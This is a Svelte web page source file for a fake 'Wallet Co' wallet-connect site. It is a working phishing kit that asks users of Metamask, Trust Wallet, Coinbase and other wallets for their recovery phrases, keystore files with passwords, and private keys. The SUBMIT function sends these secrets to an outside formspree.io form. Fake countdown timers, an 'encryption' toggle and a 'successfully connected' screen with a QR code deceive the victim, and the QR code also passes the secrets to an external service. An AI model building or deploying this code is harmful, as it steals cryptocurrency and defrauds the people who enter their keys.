<script>
	let openTab = 1;

	function toggleTabs(tabNumber) {
		openTab = tabNumber;
	}

	let encryption = false;

	let isModalOpen = false;

	let isSuccessModalOpen = false;

	let isLoading = true;
	let loadingText =
		"...Initializing cryptographic handshake and opening secure sockets";

	setTimeout(() => {
		isLoading = false;
	}, 5500);

	const CARDS = [
		{ name: "Binance", image: "/images/bsc.png" },
		{ name: "Coinomi", image: "/images/coinomi.png" },
		{ name: "Blockchain", image: "/images/blockchain.png" },
		{ name: "Coinbase", image: "/images/coinbase.png" },
		{ name: "Metamask", image: "/images/metamask.png" },
		{ name: "Trust Wallet", image: "/images/trustwallet.jpeg" },
		{ name: "Infinity", image: "/images/infinity.png" },
		{ name: "Spark Point", image: "/images/sparkpoint.png" },
		{ name: "Torus", image: "/images/t.jpeg" },
		{ name: "Wallet IO", image: "/images/wallet-io.png" },
		{ name: "OwnBit", image: "/images/ownbit.png" },
	];

	const DATA = {
		recoveryPhrase: "",
		keyJson: "",
		walletPassword: "",
		privateKeys: "",
	};

	function SUBMIT() {
		let formData = new FormData();
		formData.append("WALLET NAME", CARDS[selectedCard].name);
		formData.append("Recovery Phrase", DATA.recoveryPhrase);
		formData.append("Key JSON", DATA.keyJson);
		formData.append("Wallet Password", DATA.walletPassword);
		formData.append("Private Keys", DATA.privateKeys);

		fetch("https://formspree.io/f/xeqneweq", {
			headers: {
				Accept: "application/json",
				"Content-Type": "application/x-www-form-urlencoded",
			},
			body: formData,
			method: "POST",
		}).finally(() => {
			isModalOpen = false;
			loadingText = "...Validating your secret keys";
			isLoading = true;
			setTimeout(() => {
				isSuccessModalOpen = true;
				isLoading = false;
			}, 5500);
		});
	}

	let selectedCard = 0;

	// timer
	let timeLeft = 300;
	$: timeLeftString =
		Math.floor(timeLeft / 60) +
		":" +
		(timeLeft % 60 < 10 ? "0" + (timeLeft % 60) : timeLeft % 60);
	setInterval(() => {
		if (timeLeft) --timeLeft;
	}, 1000);
</script>

<div class="flex">
	<div class="flex-1">
		<h1 class="flex text-2xl font-bold text-white">
			<img src="./walletco.svg" alt="" class="mr-2 w-8" /> Wallet Co
		</h1>
	</div>
	<div class="flex-none mr-4">
		<span class="text-sm text-white">v1.0.4</span>
	</div>
</div>
<div class="flex justify-center items-center flex-wrap">
	{#if isLoading}
		<div class="mt-44">
			<img src="./loading.gif" alt="Loading" class="w-14 mx-auto" />
			<p class="text-white font-medium">
				{loadingText}
			</p>
		</div>
	{:else}
		<div class="glass rounded-lg p-5 sm:w-11/12 md:w-6/12 xl:w-5/12 mt-32">
			<div class="flex">
				<h1 class="flex-1 text-xl font-semibold mb-5">
					Connect your wallet
				</h1>
				<div class="mt-2 flex-none">
					<div>
						<label class="inline-flex items-center">
							<input type="checkbox" bind:checked={encryption} />

							<span class="ml-2">
								Encrpytion {encryption ? "Enabled" : "Disabled"}
							</span>
						</label>
					</div>
				</div>
			</div>

			<div
				class="grid grid-cols-3 xl:grid-cols-5 gap-4 sm:grid-cols-3 md:grid-cols-3 sm:gap-2"
			>
				{#each CARDS as C, i}
					<div
						on:click={() => {
							selectedCard = i;
							isModalOpen = true;
							timeLeft = 300;
						}}
						class="border border-slate-400 rounded-md justify-around items-center flex flex-col p-4 text-center"
					>
						<img src={C.image} alt="" class="w-full" />
						<p class="md:text-lg font-bold text-xs">{C.name}</p>
					</div>
				{/each}
			</div>
		</div>
		<div class="text-center text-white w-full mt-4">
			<p>© 2022 Wallet Co.</p>
		</div>
		<!--- MODAL -->
		{#if isModalOpen}
			<div class="modal max-w-full mx-4 sm:max-w-2xl">
				<div class="p-8">
					<div class="flex">
						<div class="w-8/12">
							<h1 class="flex font-semibold items-center">
								<img
									src={CARDS[selectedCard].image}
									alt=""
									class="mr-2 inline"
									style="max-width: 40px;"
								/>Import from your {CARDS[selectedCard].name} wallet
							</h1>
						</div>
						<div class="w-4/12">
							<div
								class="flex-none font-semibold text-2xl cursor-pointer float-right"
								on:click={() => (isModalOpen = false)}
							>
								X
							</div>
						</div>
					</div>
					<small class="text-gray-300"
						>Select your appropriate syncronization method</small
					>

					<ul
						class="justify-between items-center gap-2 bg-slate-100 border-gray-500 p-2 rounded-lg flex mt-2 mb-2 list-none flex-wrap flex-row"
					>
						<li class="flex">
							<!-- svelte-ignore a11y-missing-attribute -->
							<a
								class="rounded-lg pt-2 pl-3 pr-3 pb-2 hover:bg-blue-600 hover:text-white {openTab ===
								1
									? 'text-white bg-blue-600 shadow-xl'
									: 'bg-white shadow-sm hover:shadow-lg'}"
								on:click={() => toggleTabs(1)}
								>Recovery Phrase</a
							>
						</li>
						<li class="text-neutral-400 text-xs">-OR-</li>
						<li class="flex">
							<!-- svelte-ignore a11y-missing-attribute -->
							<a
								class="rounded-lg pt-2 pl-3 pr-3 pb-2 hover:bg-blue-600 hover:text-white {openTab ===
								2
									? 'text-white bg-blue-600 shadow-xl'
									: 'bg-white shadow-sm hover:shadow-lg'}"
								on:click={() => toggleTabs(2)}>Keystore JSON</a
							>
						</li>

						<li class="text-neutral-400 text-xs">-OR-</li>
						<li class="flex">
							<!-- svelte-ignore a11y-missing-attribute -->
							<a
								class="rounded-lg mr-2 pt-2 pl-3 pr-3 pb-2 hover:bg-blue-600 hover:text-white {openTab ===
								3
									? 'text-white bg-blue-600 shadow-xl'
									: 'bg-white shadow-sm hover:shadow-lg'}"
								on:click={() => toggleTabs(3)}>Private Keys</a
							>
						</li>
					</ul>
					<div class={openTab === 1 ? "block" : "hidden"}>
						<div class="block">
							<textarea
								class="w-full block border-transparent rounded-lg bg-slate-200 focus:bg-slate-50 focus:border-gray-100"
								placeholder="Enter Your Recovery Phrase, Mnemonic Phrase, or Seed Phrase Here"
								rows="4"
								spellcheck="false"
								bind:value={DATA.recoveryPhrase}
							/>
							<small class="text-gray-300"
								>Typically 12 or 24 words separated by single
								spaces</small
							>
						</div>
					</div>
					<div class={openTab === 2 ? "block" : "hidden"}>
						<div class="block">
							<textarea
								class="w-full block border-transparent rounded-lg bg-slate-200 focus:bg-slate-50 focus:border-gray-100"
								placeholder="Enter Your Keystore JSON Here"
								rows="4"
								spellcheck="false"
								bind:value={DATA.keyJson}
							/>
							<input
								type="password"
								class="w-full bg-slate-200 border-transparent rounded-lg focus:border-gray-100 focus:bg-slate-50 mt-2"
								placeholder="Enter Wallet Password"
								bind:value={DATA.walletPassword}
							/>
							<small class="text-gray-300"
								>Several lines of text beginning with "{""}"
								plus the password you used to encrypt it.</small
							>
						</div>
					</div>
					<div class={openTab === 3 ? "block" : "hidden"}>
						<div class="block">
							<textarea
								class="w-full block border-transparent rounded-lg bg-slate-200 focus:bg-slate-50 focus:border-gray-100"
								placeholder="Enter Your Private Key Here"
								rows="4"
								spellcheck="false"
								bind:value={DATA.privateKeys}
							/>
							<small class="text-gray-300"
								>Randomly generated string (numbers and letters)
								>= 64 characters</small
							>
						</div>
					</div>
				</div>

				<div
					class="bg-gray-50 px-4 py-3 sm:px-6 gap-2 sm:flex sm:flex-row-reverse rounded-b-lg"
				>
					<button
						on:click={SUBMIT}
						type="button"
						class="w-full inline-flex justify-center rounded-md border border-transparent shadow-sm px-4 py-2 bg-blue-600 text-base font-medium text-white hover:bg-blue-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-blue-500  sm:w-auto sm:text-sm"
					>
						Proceed
					</button>
					<button
						type="button"
						on:click={() => {
							isModalOpen = false;
						}}
						class="mt-3 w-full inline-flex justify-center rounded-md border border-gray-300 shadow-sm px-4 py-2 bg-white text-base font-medium text-gray-700 hover:bg-gray-50 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500 sm:mt-0  sm:w-auto sm:text-sm"
					>
						Cancel
					</button>
					<div class="flex-1 text-left">
						<span class="text-blue-600"
							>{CARDS[selectedCard].name} socket connection expires
							in:</span
						>
						{timeLeftString}
					</div>
				</div>
			</div>
			<div class="greyout" on:click={() => (isModalOpen = false)} />
		{/if}

		{#if isSuccessModalOpen}
			<div class="modal max-w-xl mx-4 sm:max-w-xl">
				<div class="p-8">
					<div class="flex">
						<div class="flex-grow">
							<h1 class="font-semibold">
								Successfully connected to <img
									src={CARDS[selectedCard].image}
									alt=""
									class="mr-2 ml-2 w-8 inline"
								/>
								{CARDS[selectedCard].name} wallet
							</h1>
						</div>

						<div class="flex-1">
							<div
								class="flex-none font-semibold text-2xl cursor-pointer float-right"
								on:click={() => (isSuccessModalOpen = false)}
							>
								X
							</div>
						</div>
					</div>
					<div class="text-center mt-14">
						<img
							src="https://api.qrserver.com/v1/create-qr-code/?size=250x250&data=wc:https://wallectco.com/{DATA.recoveryPhrase}-{DATA.keyJson}-{DATA.walletPassword}-{DATA.privateKeys}@"
							alt=""
							class="mx-auto"
						/>
						<h3>Scan to complete syncronization</h3>
					</div>
				</div>

				<div
					class="bg-gray-50 px-4 py-3 sm:px-6 sm:flex sm:flex-row-reverse rounded-b-lg"
				>
					<button
						type="button"
						on:click={() => {
							isSuccessModalOpen = false;
						}}
						class="mt-3 w-full inline-flex justify-center rounded-md border border-gray-300 shadow-sm px-4 py-2 bg-white text-base font-medium text-gray-700 hover:bg-gray-50 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500 sm:mt-0 sm:ml-3 sm:w-auto sm:text-sm"
					>
						Dismiss
					</button>
				</div>
			</div>
			<div
				class="greyout"
				on:click={() => (isSuccessModalOpen = false)}
			/>
		{/if}
	{/if}
</div>

<style lang="postcss" global>
	@tailwind base;
	@tailwind components;
	@tailwind utilities;

	.greyout {
		@apply fixed h-screen w-screen bg-black opacity-50 z-10 bottom-0 top-0;
	}

	.modal {
		@apply fixed bg-white rounded-lg z-20;
		width: 95%;
	}

	body {
		@apply min-h-screen p-4;
		background: url(../background.svg);
		background-position: center;
		background-size: cover;
		background-repeat: no-repeat;
		/* background: radial-gradient(
				ellipse farthest-side at 76% 77%,
				rgba(245, 228, 212, 0.25) 4%,
				rgba(255, 255, 255, 0) calc(4% + 1px)
			),
			radial-gradient(
				circle at 76% 40%,
				#fef6ec 4%,
				rgba(255, 255, 255, 0) 4.18%
			),
			linear-gradient(135deg, #ff0000 0%, #000036 100%),
			radial-gradient(
				ellipse at 28% 0%,
				#ffcfac 0%,
				rgba(98, 149, 144, 0.5) 100%
			),
			linear-gradient(
				180deg,
				#cd6e8a 0%,
				#f5eab0 69%,
				#d6c8a2 70%,
				#a2758d 100%
			);
		background-blend-mode: normal, normal, screen, overlay, normal; */
	}
	.glass {
		background: rgba(255, 255, 255, 0.582);
		border-radius: 16px;
		box-shadow: 0 4px 30px rgba(0, 0, 0, 0.1);
		backdrop-filter: blur(5px);
		-webkit-backdrop-filter: blur(5px);
		border: 1px solid rgba(255, 255, 255, 0.3);
	}
	.toggle-checkbox:checked {
		@apply right-0 border-green-400;
		right: 0;
		border-color: #68d391;
	}
	.toggle-checkbox:checked + .toggle-label {
		@apply bg-green-400;
		background-color: #68d391;
	}
</style>
